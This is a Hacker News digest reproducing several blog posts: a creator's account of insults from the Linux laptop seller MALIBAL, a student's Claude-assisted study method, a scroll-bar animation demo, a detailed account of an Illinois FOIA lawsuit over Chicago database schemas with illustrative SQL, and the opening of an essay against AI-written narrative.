Hacker News - Small Sites - Score >= 1 | https://news.ycombinator.com | Mon, 03 Mar 2025

Linux laptop maker called me a Zombie
@todsacerdoti | March 2, 2025 | https://thelibre.news/this-linux-laptop-maker-called-me-a-zombie/

Two years ago I was contacted by a company called MALIBAL.

They were interested in a sponsorship, where I would simply put their link in the video description and get money for it.

I did a quick background check, and they seemed like a proper Linux hardware manufacturing company. I said I'd be happy to shout them out in the videos too, and we agreed on a price.

Initially, things seemed to be going pretty well. They did decide that my demographic wasn't that appealing to them, and that they would thus only sponsor one video per week, which was reasonable.

However, I made a mistake. I changed my publishing schedule at the last minute, which meant switching the description sponsorship from one video to another; what I did not notice is that towards the end of the video I chose to be sponsored, I had said, "This video is not sponsored." Big mistake on my part.

MALIBAL did notice. This is the sort of mistake I could have quickly fixed through the YouTube video editor, but they preferred to end our partnership outright, without giving me enough context to realize what the mistake was. They also told me to bill for the GNOME video as usual.

One month later, as agreed, I billed them for the video. I still had no idea about the mistake. They replied with, and I quote,

You have a lot of nerve sending me this invoice considering you literally say in the video that it's NOT sponsored. What a crackhead. Did you really think you were getting away with that? KDE is the trash bin of the Linux world. There is no wonder that's what you like [sic]

Woah. I explained that the mistake was due to the schedule change, and that I could have fixed it in the YouTube editor; but I also pointed out that this sort of language was unacceptable.

They replied with the simple sentence "You're a zombie who is dead and empty inside. You don't even exist".

And that was it. I no longer did any sponsorship with MALIBAL, and I thought that was going to be the end of it.

However, a quick search into user experiences with MALIBAL reveals that this type of reaction is pretty common.

One user said that when he tried to cancel the order due to slow shipping, they replied with "Don't ever place an order with us again or it will be canceled", and soon after: "Good one, zombie. You don't even exist. Back into the abyss you go".

Another user received the reply "It's the response a phantom, zombie like you deserves. You don't exist. You're not a person. You are here to simply suck life out of the human. If you weren't dead and empty inside you would feel shame for what you have done".

These are just a few examples. Reddit is full of support replies like these, sent after the slightest pushback from customers.

Even people who claim to have worked with MALIBAL professionally state that they had to "decline their business" as they were "too difficult to work with", eventually being called zombies as well.

This is just the tip of the iceberg in terms of the general weirdness of MALIBAL.

Firstly, they issued a response to this whole "zombie" accusation, trying to claim it did not happen (but it did; it happened to me too) and declaring that the official name of the scandal is "Zombiegate".

To distance themselves from it, they listed all of Apple's scandals, then claimed that what happened with them is not that bad in comparison.

I absolutely love their closing statement here:

Our commitment? To tirelessly support our customers—zombie, ghost, or otherwise—while maintaining a level of integrity befitting the smallest scandal possible. After all, the abyss awaits us all… but here at MALIBAL, we’ll send you there with a smile. 🙂

I can't help but laugh at the thought that the person replying to emails with insults is the very same person who approved this text.

As another example, due to a discussion about coreboot that I will focus on later, they decided to ban the entire country of Germany from their services. They banned … Germany, due to the actions of a single person there. Oh, and they also banned Austria and Liechtenstein, because they're also Germany. Somehow.

They also don't ship to California due to regulations impacting small businesses there.

They also don't ship to Colorado due to the actions of Jeremy Soller.

They also don't ship to Maryland due to the actions of Matt DeVillier.

They also don't ship to Poland due to the actions of Piotr Król.

They also refuse to ship anything made by AMD due to, again, Matt DeVillier.

Or - I just can't stop now - their terms and conditions specifically say that you cannot use Chrome to access their website, nor can you use Gmail to create an account on it, use a Pixel phone to access it, use the Android operating system to view it, or use any other Google product, including Google Search. You literally cannot use Google Search to open their website, according to their terms and conditions. What!? If you are found to be using any of these technologies, your account will be terminated without notice.

Oh, and, by the way, the same applies to Apple. You can't access the website through Safari, an iPhone or any MacBook, or register using Apple Mail.

Oh, and, by the way, the same applies to Reddit users. If you use Reddit frequently, you are prohibited from using their website. They also have half a page just to explain exactly what they mean by "active Reddit user".

They have quite a track record of doing all of this. Back in 2017, they were already in business, allegedly censoring negativity on the NotebookReview forums and banning users, including customers with valid warranties, after they made negative comments.

More recently, they managed to get into the Linux news cycle by publishing an article called "Don’t Support the Coreboot Project".

What happened? Well, they wanted their machines to support coreboot, so they contacted 9elements to ask for coreboot-supported boards. When they learned that these were priced between $50k and $100k, they decided to instead develop them themselves. However, they did not have the necessary skills to do so, which made them come back to 9elements to ask for help.

Now, Christian, of 9elements, does not speak English natively, and he did apologize for the sometimes broken language and typos in his emails after this article was published. It seems, however, like most of the conflict stems from the fact that MALIBAL thought their code was pretty much ready and only required a little debugging, whereas 9elements thought that there was still much work to be done.

Christian offered to work on coreboot support for the laptops in exchange for a commission on each laptop sold, something MALIBAL saw as borderline stealing. Then, when a developer called Max was assigned to the project, MALIBAL complained that he was not experienced enough.

MALIBAL was also asking for updates at what seems like an unreasonable pace. You can see it in their own article, where they point out that "several more days passed without any updates". This was also later confirmed by 9elements.

They started accusing Max of not actually working full time but only a few hours, and they asked for another developer to be put on the project. Mind you, by this point there was still no contract with 9elements, and MALIBAL had not paid them anything.

Eventually, Christian got fed up and decided to end the collaboration. 9elements sent back to MALIBAL the test hardware they had been given, and did not charge them for anything.

MALIBAL then tried to collaborate with a second contractor, 3mdeb. However, they were annoyed by the fact that 3mdeb offered a lower price if MALIBAL used a Dasharo-branded coreboot instead of an unbranded one.

Frustrated, MALIBAL completely ignored their quote (which was $33k for Dasharo coreboot and $66k for unbranded) and instead offered to pay $150 an hour with daily updates.

I do admire how 3mdeb managed to stay professional in their reply, where they pretty much said "we don't do per-hour contracting, we've sent you the quotes, that's what we're asking, and you can't just make up your own price".

As a very mature response to these two experiences, MALIBAL contacted the coreboot project and asked them to please remove 9elements and 3mdeb from the list of official contractors. Coreboot obviously refused, but Matt DeVillier - from the coreboot leadership team - told them he would try to help port coreboot to their laptop.

Now, I just have to read you the quote from their article about Matt, because it's pure poetry.

Matt DeVillier is the type of person who will suck your will to live out of you and leave you for dead. Nice guy. He embodies every trait you would never want in someone you hire for a job. He’s unprofessional, unreliable, untrustworthy, irresponsible, and incompetent. And, of course, he’s one of these types who will bludgeon you with all of these virtuous qualities, and if at any point you dare say a word in protest, he’ll try to turn things around and act like you did something wrong by calling you toxic. No, we’re not toxic, Matt. You just really honestly truly suck.

What did Matt do to deserve this? Well, the day after receiving MALIBAL's test hardware - still without being paid anything, mind you - he was assigned a high-priority project for AMD and warned MALIBAL that he could only start working a couple of months later.

During this wait, Matt started buying the tools needed to work on the project. However, he bought one from China, which MALIBAL seems to consider a mistake in itself. He then decided to source one from the US instead.

Then, he pointed out that his unit had a damaged UART connector. This is also something MALIBAL blames on him.

They continued to put pressure on him, asking for almost-daily updates, until Matt decided he was no longer interested in working with MALIBAL.

Since Matt claimed to have done nothing wrong, MALIBAL offered to let a neutral third party arbitrate the matter - which I truly don't understand. Are they trying to claim some moral high ground through a weird litigation process? They did not even pay the guy.

The article is full of extremely aggressive sentences, like "This is the type of gaslighting you would only expect from a sociopath" and, also poetry,

[Maximally bad] is where you do such a horrible job that it’s impossible to have done any worse. Not impossible for a person to have done worse; impossible for anyone or anything to have done worse: a person, a monkey, a rock, etc.

MALIBAL concludes this whole piece by claiming that it's possible to finish the project in barely 40 hours. They are unable to do it themselves because they don't seem to have the skills, but still, 40 hours.

Finally, MALIBAL wants us to know that, throughout these exchanges, they tried their best not to offend anyone and to get along as much as possible. As an example, they did not call anyone "a monkey", nor did they imply that anyone was one. Thanks, MALIBAL.

Now, most parties involved did briefly reply to this article. Matt stated:

FWIW, none of the entities listed ever charged or were paid by Malibal for any work done. Evaluation of the state of their existing work and what they wanted done was done as a courtesy, and any further work was declined by the consultant(s). No contracts were ever signed, no statements of work produced.

9elements also published a blogpost, which includes the following quote:

Throughout the engagement, we encountered communication challenges, including frequent status update requests and a misalignment between expectations and technical realities. The initial firmware required considerable work before it could be tested on hardware, which understandably caused some delays. Unfortunately, during this period, the tone of communication from MALIBAL became less constructive.

Now, I would love to know more about who's behind MALIBAL, and about what's happening within the - probably single-person - company. However, I have not found any information about that; if you have any, please feel free to contact me.

I do fear that, by publishing this piece, I might get the entire country of Italy banned from them. But I believe it's a risk worth taking.

BM25 in PostgreSQL – 3x Faster Than Elasticsearch
@gaocegege | March 2, 2025 | https://blog.vectorchord.ai/vectorchord-bm25-revolutionize-postgresql-search-with-bm25-ranking-3x-faster-than-elasticsearch

Unable to retrieve article.
How I Ace Midterms at a Top CS School by Studying 1-3 Hours (and Skipping Class)
@ocean_moist | March 2, 2025 | https://rohan.ga/blog/studying/

I have a midterm tomorrow (actually)[0] and instead of studying I decided to write this piece on exactly how I spend as little time as possible on school while achieving decent results (top ~5-10% on tests).

This protocol is heavily tailored to me and my background specifically. I do think some people can get a few ideas from this though.

tl;dr:

Step 0: Optimize health and mental state (sleep, nutrition, meditation).
Step 1: Use Claude to quickly analyze lecture slides and practice tests.
Step 2: Memorize slides by creating interconnected mental stories.
Step 3: Brain dump notes, write code, and practice active recall.
Step 4: Take practice test, rapidly iterate on weak areas.
Step 5: Identify easy wins—predict and memorize likely test content.
Step 6: Final review, active recall, and Claude-powered reinforcement right before the exam.

background

I’m a decent test-taker and code a lot, so most concepts aren’t new. I rarely attend lectures and do the bare minimum homework required to pass. My broad curiosity gives me wide, shallow knowledge. Interestingly, I enjoy taking tests, especially multiple-choice.

studying process

The zeroth thing: the night before the exam I get perfect sleep, and on the morning of the exam I minimize the amount of brainpower I spend until test time. I eat properly and cleanly, and I meditate (which I generally try to do daily anyway). This is maybe the biggest power law in terms of my score on exams. Around 2-4 hours immediately before the exam, I start the process.

The first thing I do is collect all of the lecture slides + practice tests, upload them to a Claude project, and ask it what's on the exam. I'll ask for the types of questions, a structured overview of the materials, and what I have to know/memorize. What's especially important at this stage is getting a feel for the types of questions the test likes to ask, without revealing any specific questions from the practice test. This should take no longer than 15 minutes. If I feel like I already know 100% of everything on the test, I skip straight to taking the practice test.

I will then read over all the lecture slides once and commit them to memory. I'll frame it like a story: X works with Y to do Z, Z is used to do A, you need A to do B, and so on. I'll also relate them to concepts I already know; the point is just to build a mental map. After reading the slides for one lecture, I'll see if I can recall them before moving on to the next.

After I memorize all the lecture slides, I'll brain dump everything I know into written notes. I'll try to be as accurate and all-encompassing as possible. I will also try to write as much code as possible while taking these notes, to get familiar with writing code on paper with a pencil. I'll then review all the notes and see what I missed. Generally I miss a few details for each concept. I will rewrite whatever I missed, and for particularly tricky concepts I'll make a mental note to recall them later on in my studying/reviewing (active recall).

I then take the practice test. I will go over my test-taking strategy in the next section; generally I just take the test as fast as possible and answer every question at this stage. I'll then review and rewrite all the questions I got wrong, referring only to my written notes.

After this I go for easy wins, trying to figure out exactly what's on the test. I'll give an example: if you know that only topics from the lectures + homework are covered, and that the practice tests and real tests are similar, you can infer and just memorize stuff that will probably be on the test. If there is a practice question about implementing an algorithm, and you only covered two algorithms in your homework for that specific section, chances are you can just memorize the other algorithm and be fine. Some test questions are so specific that all permutations of them are obvious, and you can just memorize the trick or the entire solution to them.

To keep my mind warm, I'll ask Claude for questions similar to the ones on the practice test and try to recall the lecture slides (particularly the tricky parts) while I am walking to take the test. If there are complex/technical things, I'll have Claude explain them to me again and review my physical notes.

The best part about the process is that you can basically start at any step depending on how confident (or lazy) you are. Sometimes I just talk to Claude frantically while walking. You can also do this days before the exam, and multiple times, to ensure you know everything 100%.[1]

Generally, what I notice is that if you actually do and 100% know the homework, and you go to lecture, you just don't have to study (shocker).

test taking strategy

The way I take tests: I skim the whole test front to back first. Then, if I am very lost, I'll start with the easiest questions (I often do this when I haven't studied at all), but generally I just go front to back and circle the harder questions to come back to later. I am trying to go as fast as possible and rely on my intuition as much as possible. The asterisk is that if I attempt a problem (write something down), I will see it through until I get an answer or hit a complete blocking point (like I just don't know something, and I can clearly articulate what piece of knowledge I am missing). I will never actively stop my train of thought because I am taking too long (my CS tests generally give loads of time, so I don't have to worry about this). If the question is multiple choice, I will eliminate every other option instead of just finding the one that's correct. Once I am done, I'll go back to the hard, circled questions. I am generally completely in flow, and I'll slow down the rush and cadence of my test-taking once I get to the circled questions.

Once I have answered every question, I'll go back and review all the multiple-choice ones: retrace my chain of thought and verify I didn't do anything stupid. I'll often also try to solve the problem in different ways to verify. For the questions where I write code, I'll briefly go over how I thought about the problem, but I mainly look for syntax errors. I don't keep checking my work until the time runs out, mainly because I just don't find that to be the most valuable use of my time. But on the SAT and other tests I did do this, and it will maximize your score. When you are checking an answer, you should have a clear and defensible chain of thought. If you are not sure, don't change your answer; just go with your initial instinct. Only change it if you made a silly mistake or there was a clear and distinct error in your previous chain of thought.

After the test I rarely have any clue how I did because I was just in flow state. It’s like I just blacked out and took the test. I immediately forget everything that is on the test too. If I am asked a question about it the next day I won’t even remember what you are talking about and I’ll probably search it up.

conclusion

This is my process; my mind works in very mysterious ways. The main reason I am efficient with my time is that I have the (learned) ability to focus for many hours at a time, and there is no "waiting" time or "relaxing" time when I am studying. I don't take breaks, and my mind is always firing on all cylinders, 100% occupied.

I have a decent memory, but the pieces of information need to be highly interconnected. My memory is mostly a result of being able to find these connections, not just raw memorization. I also have never not studied like this; it is the only way I currently study. I never did much meta-work creating this workflow; this is just a description of what happens when I need to take tests (although I had prior knowledge of "active recall" and memory stuff, because I find that interesting).

There are risks to this approach: if you bite off more than you can chew, you have no time to self-correct. If you do this short/intense thing a lot, you can burn out. I don't know how well this would work on humanities tests. I just don't care enough about school to spend any more time than what I give.

Hopefully this doesn’t come off like I am bragging. Although my test scores are decent my GPA is very subpar and I am far from the picturesque college student. I am involed in almost no university affiliated activities. I have never scored the highest in the class. I don’t reccomend my exact approach, though I think implementing the elements into something more sustainable/personal is valuable.

why? (postscript)

Why would anyone not choose to attend the school they pay for? Why would they try and game the system?

For me, this is because I feel like, particularly in computer science, I have all the necessary skills and knowledge to do what I want. I want to build stuff, make stuff. I spend most of my time trying to build and make stuff. Somehow I thought in high school that my CS curriculum would cover things I couldn't learn online, or would be significantly different from what I already knew. It turns out this was not the case.

Going to school, for me, is a hedge. If I can't or don't build something of significance, it'll be easier for me to get a job with a degree. As soon as I build something with clear evidence of significance, I will stop doing school. The other option is dropping out and trying to find work now, but I don't know if I really want to work for someone else, or if I could even find a job. It would most likely be at a startup, which is a huge career risk. Although, I would 100% drop out if I could work on an interesting problem with smart people.

[0] proof

[1] It’s also scalable. I did this process when I was in algebra 2 (or maybe precalc?) to self-study for the AP Calc BC exam. I think the extent of my calc knowledge was limits + derivative is slope of the tangent line + integral is area under the curve. I pulled an all-nighter the day before the exam and just took it (this was apparently “fun” to me at this point in my life). I of course, only got a 3, which is a passing score but not one that helped me. Actually I used that score to take Calc 3 + linear algebra at community college while in HS but in college, even though I had Calc 3 credit I had to somehow make up Calc 1 and Calc 2 credit.

[2] I can’t do study groups. I actively bring down the productivity of study groups. I also notice I can’t code (work) when I am around my friends. Like even them just being in the corner of my vision prevents me from locking in. I am too drawn to social interaction. Different story if we are working together though.

Made a scroll bar buddy that walks down the page when you scroll
@hello12343214 | March 2, 2025 | https://focusfurnace.com/scroll_buddy.html

( Look at your scroll bar when you scroll )

Instead of a boring scrollbar, I thought it would be fun to have an animated stick figure that walks up and down the side of your page when you scroll.

This is the first prototype I made.

Going to make a skateboarder, rock climber, or squirrel next. What other kinds of scroll buddies should I make?

Get a scroll buddy for your website

Warning: An embedded example on the side of this page has an animation / movement that may be problematic for some readers. Readers with vestibular motion disorders may wish to enable the reduce motion feature on their device before viewing the animation. If you have reduce motion settings turned on Scroll Buddy should be hidden on most browsers.

Made with simple JavaScript.

(The original page continues with lorem ipsum filler text, included only to give the page enough content to scroll.)
Losing a 5-year-long Illinois FOIA lawsuit for database schemas

March 2, 2025 — Matt Chapman (@chaps) | https://mchap.io/losing-a-5yr-long-illinois-foia-lawsuit-for-database-schemas.html

Thomas Ptacek, a friend and expert witness in this lawsuit, summed it up best in the courthouse hallway while walking within three feet of opposing counsel: "This is fucking stupid".

His companion post explains why.

Intro

Working with the City of Chicago's parking ticket data—which I've received through FOIA—has always been a pain, especially in terms of knowing what exactly to request. In August 2018, I attempted to solve that problem generally, by submitting a request for the following:

An index of the tables and columns within each table of CANVAS.
Please include the column data type as well.

Per the CANVAS specification, the database in question is Oracle, 
so the below SQL query will likely yield the records pursuant to this request:

select utc.column_name as colname, uo.object_name as tablename, utc.data_type as type
from user_objects uo
join user_tab_columns utc on uo.object_name = utc.table_name
where uo.object_type = 'TABLE'

CANVAS Database Schema request on Muckrock

After the City initially denied the request with an argument that the records' release would compromise network security, I took the denial to court, where we initially won at trial. The City then appealed, and we won that as well. The case ultimately went up to the Illinois Supreme Court, where we lost unanimously. Better Government Association did a good explainer of the consequences of that loss, which boil down to a significant broadening of public agencies' leeway to apply exemptions (i.e., withhold records or redact information) in response to FOIA requests.

Why Go Through All of This?

Under Illinois FOIA case law, if a request's responsive documents—the set of records or information within the scope of that request—are stored in a queryable database, a query must be written. The requester is not required to write the query. The law even requires the agency to give you the data in a format of your choice (protip: "excel format"). When it works, it's freaking great. Reality makes it difficult for a number of reasons, though:

  • The FOIA officer will likely need to defer any querying to a colleague who is a "data person."
  • You can't just ask a question: "FOIA does not compel the agency to provide answers to questions posed by the inquirer."
  • From the requester's perspective, "Is X column requestable?" isn't answerable without first attempting to request that column's data.
  • Requesting too many columns will likely lead to time-consuming back-and-forth, or a flat-out denial.
  • Even though Illinois FOIA requires that a requester be given a chance to narrow their request, FOIA officers sometimes just stop responding during this "conferral" process.

To work around this problem, many folks will spend hours surfing through PDFs, reports, contracts, work products, etc., just to get a sense of what data might exist. This process is frustrating and often yields incomplete results. Let's walk through my attempt with CANVAS.

First Attempts for Parking Ticket Data

My very first FOIA request was pretty narrow and sought the City's towing data. The City was unable to get me what I requested, for reasons I can't seem to find, but it painted a picture that Chicago doesn't really track how cars are towed.

A month later, the project began shifting towards parking ticket data in addition to towing data, so I requested:

all raw towing and parking violation records available in the CANVAS system and any records that are from imported/interpolated from non-CANVAS systems.

This request was denied. The Department of Finance argued that the request would take anywhere between 140 and 200 hours to complete:

There are 55 million ticket records and 928K seizure records in CANVAS. As far as tow information, we only have knowledge of when a vehicle is towed due to a boot and released. The Department of Finance's application support vender estimates a minimum of 60-80 hours to design/develop/test and run the program.

In addition, since this is like a conversion to another system, we are not sure how long it would take to transfer so much data, a rough estimate would be an additional 80-120 hours to design a solution to get all the data on some kind of media for retrieval. Compliance with this request as currently written would take approximately 140-200 hours utilizing our vendor's resources to the exclusion of other work assignments.

A couple of months and some phone calls later, I submitted a narrower request, which was successfully fulfilled because I included an explicit list of fields. After honing the request language a bit more, I was eventually able to get the data used in the analysis of my first blog post.
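To give a sense of what "an explicit list of fields" looks like in practice, here is a minimal sketch. The table and column names below are hypothetical, invented purely for illustration, since CANVAS's actual schema is exactly what the City refused to disclose:

-- Hypothetical sketch only: these table and column names are invented,
-- since the real CANVAS schema is what the City declined to release.
SELECT ticket_number,   -- unique identifier for each citation
       issue_date,      -- when the ticket was written
       violation_code,  -- e.g. expired meter, street cleaning
       fine_amount,     -- the initial fine
       ward             -- the ward where the ticket was issued
FROM   parking_tickets
WHERE  issue_date >= DATE '2013-01-01';

Spelling out every field like this leaves the agency nothing to interpret, which is exactly what made the narrower request succeed.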

But Wait, Is There More?

Despite getting the limited information I had requested, I still wanted to expand my analysis, which required knowing what other information exists within CANVAS. So, I submitted another request for high-level and low-level system information:


1. Code for CANVAS
2. Logs of CANVAS and/or CANVAS log analysis. 
3. Documentation for the operation of CANVAS, including how information is stored, what kind of database is used, along with any other technical documentation or generic documentation.
4. Any Wiki page related to CANVAS.
5. Any analysis of City parking ticket levels or trends.

The only record the City sent in response was a lackluster spreadsheet with just 100 rows, broken down by ward. I'm still not sure whether this was the only analysis ever done at the time, but let's get back to the meat of this blog post.

Items 1, 2, and 3 were denied because:

[The records] could be used in a security breach against CANVAS and jeopardize the security of the system, therefore it is being withheld.

But given that the goal was just figuring out what information exists, the request was extremely wide and could have been narrowed to something more akin to a "data dictionary". To this day, I've never been able to get anything like a data dictionary from the City, even though there is a contractual obligation—as described in the RFP spec for this $200 million system—for the City to maintain something like that! But alas, at least in 2018, the City claimed they didn't have anything like it.

https://www.documentcloud.org/documents/25537825-document/#document/p180/a2624483
—Professional Services Agreement Between the City of Chicago Department of Finance and Department of Administrative Hearings and IBM Corporation: City of Chicago Violation, Noticing and Adjudication Business Process and System Support, p. 180 (2012)

Requesting Database Records from All City Databases

Sensing a pattern of a general failure to maintain data dictionaries, despite the City's public support for launching one, I submitted a FOIA request to every City agency for the following:

1. A short description of the database.
2. The names of the applications that are able to run queries/inserts.
3. All usernames and permissions
4. All database table names.
5. All column names in each table.
6. A description of each column.
7. Number of rows in each table.

A couple weeks later, Chicago's Department of Law sent me a letter on behalf of every agency and denied all parts, 1 through 7, of that request.

First, they argued that they would need to "create a new document":

First, no City Department is in possession of a document which contains the information you seek. The only way to compile the requested information, to the extent it is not exempt for one or more of the reasons noted below, would be to create a document.

Then, they requested a pedantic clarification about what "database" means:

Your request does not provide a definition of the term database. A commonly accepted definition of "database" is collection of pieces of information that is organized and used on a computer. http://www.merriam-webster.com/dictionary/database. Such a broad definition would include Excel spreadsheets. It would be unduly burdensome to the operations of each of the City's Departments to search every computer in use by its personnel in order to identify, open,review and catalogue each database and every Excel spreadsheet in the manner you request."

But even with all of that, they offered a helpful suggestion, and pointed to the City's "data dictionary":

Please note that in late 2013, the City of Chicago launched a publically available Data Dictionary which can be found at http://datadictionary.cityofchicago.org/. It is described as “a resource for anyone who is interested in understanding what data is held by City agencies and departments, how and if it may be accessed, and in what formats it may be accessed.”

Cool! It's a damn shame the system shut down less than a year later, though.

"Metalicious": Chicago's Failed Data Dictionary

A lot of government agencies have absolutely recognized the problem of the public not knowing what information exists, including Chicago. One such attempt at fixing this problem is to voluntarily make the column and table names of their databases open to the public, like the Department of Justice's PDFs of table names, column names, and descriptions of both. There's even an open specification for government database schemas!

But even with agencies voluntarily making schema information public, such releases are effectively discretionary and are outside of the realm of FOIA.

One such release of discretionary information, as the Department of Law mentioned in their denial letter, is the city-wide data dictionary project launched in 2013, called "Metalicious". That's the actual name.

Metalicious was funded by a $300,000 John D. and Catherine T. MacArthur Foundation grant to UChicago's Chapin Hall, with the intended purpose of making table names, column names and descriptions of both publicly accessible. It's the City's "data dictionary".

CANVAS!

Schema information of the Chicago Budget System on Metalicious (2016)

An example of a system whose database schema information was released is the Chicago Budget System (CBS). A total of 110 tables are listed, with descriptions and a link to each table's columns. An interesting table worth investigating on its own is BOOK_ALDERMANIC_PAYRATE, which is described as "data used for creating pay schedule for aldermanic staff published in the Budget Book". Good to know!
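This is exactly why published schemas matter for FOIA: once you know a table like BOOK_ALDERMANIC_PAYRATE exists, you can hand the agency a ready-to-run query instead of guessing. A sketch, with hypothetical column names, since Metalicious published only the table's name and description:

-- Sketch of a request query enabled by knowing the table name.
-- The column names here are hypothetical; only the table's name and
-- description were published on Metalicious.
SELECT staff_title,
       pay_grade,
       hourly_rate
FROM   BOOK_ALDERMANIC_PAYRATE
ORDER  BY pay_grade;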

Metalicious received some attention in civic data circles:

Journalists and civic inquisitors can use it to determine what information is available when composing Freedom of Information Act requests. Based on my own experience, knowing what to even ask for has been a challenge. All that is over.

All That Is Over: Its Inevitable Shutdown

Within a few short years, the project ostensibly shut down and its front page was replaced with a message about being down for "temporary maintenance". That temporary maintenance has been ongoing for about nine years now.

Down For Maintenance

Back in 2018, I asked the City's now-former Chief Data Officer Tom Schenk why it was shut down, and he explained:

Metalicious was retired because of lack of resources to expand it (originally grant funded). It had some, but very, very small proportion of databases. There was security review of any published data and some information was withheld if we felt it could undermine the application security. By Info Sec policy, it is confidential information until a review deems it appropriate for public release--same as the open data workflow which mirrors the FOIA workflow.

RIP.

Down For Maintenance | Last-Known Running | Metalicious GitHub

Requesting Metalicious

Okay, that's not surprising, but since the first goal here was to figure out whether column and table names are requestable, I submitted my request for the MySQL dump of Metalicious. As these things go, that request was also denied:

Please be advised the Department of Innovation and Technology neither maintains nor possesses any records that are responsive to your FOIA request.

So, I submitted another request and made sure to include a quote from a press release that was explicit about the Department's ownership of Metalicious.

They eventually sent me a copy of a MySQL dump with about 150 databases' columns and table names, including their descriptions. Neat! Progress!
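For context, this is the kind of query that produces such a dump: MySQL keeps schema metadata in its built-in information_schema views, the rough equivalent of the Oracle catalog views in my CANVAS request. A minimal sketch:

-- MySQL counterpart of the Oracle catalog query from the CANVAS request:
-- list every table, column, and data type in the current database.
SELECT table_name,
       column_name,
       data_type
FROM   information_schema.columns
WHERE  table_schema = DATABASE()  -- restrict to the current database
ORDER  BY table_name, ordinal_position;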

To me, this reasonably shows that the City can provide table names and column names of City databases under IL FOIA.

The CANVAS Request and Trial

This brings us back to the FOIA request for the CANVAS database schema, which was twice appealed and died at the Illinois Supreme Court.

The request included a SQL statement for the City to run in order to fulfill it. I made some small mistakes that bit me later, which is material for another whole post. Essentially, the City denied the request by arguing that the release of this information would jeopardize the security of Chicago's systems:

Your request seeks a copy of tables or columns within each table of CANVAS. The dissemination of these pieces of network information could jeopardize the security of the systems of the City of Chicago.  Please be advised that even if you were to narrow your request, certain records may be withheld from disclosure under the exemptions enumerated in the FOIA, including but not limited to the exemption set forthin 5 ILCS 140/7(1)(o).

I disagree wholeheartedly and Thomas Ptacek goes into more detail in his companion post.

Upon receiving this denial, I reached out to my attorneys at Loevy & Loevy, who agreed to sue.

"Civic Hacker"

Eventually there was a trial in January 2020. During the trial, the City's attorneys argued that my intent was nefarious:

They are seeking the ability to have information that helps Mr. Chapman, civic hacker, go into the system and manipulate the data for whatever means he sees fit. That is not something that FOIA requires the City to do.

I have no idea where they came up with the idea that I wanted to manipulate their data, especially considering that just four months earlier, I had been asked to help the City with parking ticket reform.

While we were waiting for the trial date, Kate LeFurgy, Director of Comms for the Office of the Mayor, reached out to me and asked if I could help with some parking ticket analysis (for free). I agreed, and compiled a spreadsheet detailing how a large number of vehicles received a disproportionate number of tickets—groupings that highlight, for example, one vehicle which received at least three tickets per week for 41 continuous weeks.

This is incredible. I can't thank you enough as to how helpful this was. I truly appreciate your time and talents on this work. It has been invaluable in shaping the reform measures we hope to put in place later this year.
-Kate LeFurgy | Fri, Aug 23, 2019

Those good spirits did not last long, and LeFurgy did not respond to my emails asking for thoughts on the CANVAS litigation.

Privacy When It's Convenient

Chicago's expert witness, Bruce Coffing, said in court:

In this particular case we are saying, I'm saying that from defending this, our constituents' information, their private information, one of the things that helps us defend that system is not making this [schema information] available.

It is not the only thing we do. We do many things. But I don't want to make it easier for the bad guys and bad gals out there to attack our system and let— put our constituents' private data at risk.

This argument is striking to me, because the City has already shared so much private data through FOIA.

For instance, in 2018, when I requested parking ticket data from the Department of Finance, their FOIA officer told me that they could not include both license plates and the vehicles' registered addresses. To resolve this issue, they offered to remove the license plate data and provide only the addresses.

However, they had already given me the license plate data of millions of ticketed vehicles, in response to a different, earlier FOIA request. So, I received registered home addresses from one request, and license plates from another.

The responsive records from these two separate FOIA requests can easily be paired.
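To make the privacy problem concrete, here is a hedged sketch of that pairing. The table and column names are hypothetical, but any field shared between the two responses, such as a ticket number, makes the join trivial:

-- Hypothetical sketch: joining two FOIA responses on a shared field.
-- 'plates' stands for the earlier response (license plate per ticket);
-- 'addresses' for the later one (registered address per ticket).
SELECT p.license_plate,
       a.registered_address
FROM   plates p
JOIN   addresses a
  ON   a.ticket_number = p.ticket_number;  -- the shared key pairs the records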

To demonstrate the extent of this problem, I created this visualization which shows the scale of private information disclosed by the Department of Finance: vehicle addresses from every U.S. state, including 11,057 unique addresses of Texas vehicles and 48,707 from Michigan.

I've been told by a reliable source that the Department of Finance no longer sends license plates or registered addresses in response to FOIA requests.

Next Steps

The whole point of this entire thing was to make it easier to request data through FOIA. Ultimately, the goal is to simply send a SQL statement to an agency for them to run, and avoid so much of the usual nonsense. Basically, an API.
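As a sketch of what that could look like: instead of the back-and-forth described above, a requester would attach a statement like the following (table and column names hypothetical, as before) and receive the result set back as the responsive record:

-- Hypothetical FOIA-as-API request: ticket counts per ward per year.
SELECT ward,
       EXTRACT(YEAR FROM issue_date) AS ticket_year,
       COUNT(*)                      AS ticket_count
FROM   parking_tickets
GROUP  BY ward, EXTRACT(YEAR FROM issue_date)
ORDER  BY ward, ticket_year;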

Relatedly, these two bills from last year were interesting, and sought to fix the IL Supreme Court's bad decision. But they didn't go anywhere during last year's session.

Fortunately this year, a new bill was filed with the addition of this language:

[...] and shall include the identification and a plain-text description of each of the types or categories of information of each field of each database of the public body. [...] and shall provide a sufficient description of the structures of all databases under the control of the public body to allow a requester to request the public body to perform specific database queries.

That's pretty neat! I hope it passes.

Netflix's New Metric, Linux Mysteries, Smarter Revenue Pipelines
@dytpq0404 | March 2, 2025 | https://newtler.com/briefing/c8345ba241

Unable to extract article.
The Empty Promise of AI-Generated Creativity
@parisidau | March 2, 2025 | https://hey.paris/posts/genai/

“Are you going to add AI writing to Yarn Spinner?” It’s a question I hear almost weekly these days. Whether at game development conferences, online, or during meetings, there’s an assumption that every tool is racing to implement some form of generative AI. I understand the curiosity—we’re living through an unprecedented wave of AI hype, and there’s genuine confusion about where these technologies might fit into creative processes. So I thought I’d share some thoughts on why we’re taking a different path.

As co-founder of Yarn Spinner, I’ve reviewed countless examples of AI-generated narrative content. The verdict? Uniformly disappointing—derivative, hollow, and lacking the coherent creative thread that defines meaningful human expression. This isn’t just opinion; it’s why we’ve taken an uncompromising position: Yarn Spinner will never integrate AI that writes for you.

What strikes me about AI-generated stories, dialogue, and characters is their inherent mimicry. These systems don’t create—they rearrange existing patterns from their training data. The results feel like pale echoes of authentic work, with a distinctive blandness that comes from averaging thousands of human voices into statistical patterns. Even the most “impressive” AI-generated narratives fall apart under scrutiny. They meander without purpose, introduce plot elements they forget about, and create characters without consistent motivations. The creative thread—that intentional through-line that guides meaningful work—is conspicuously absent.

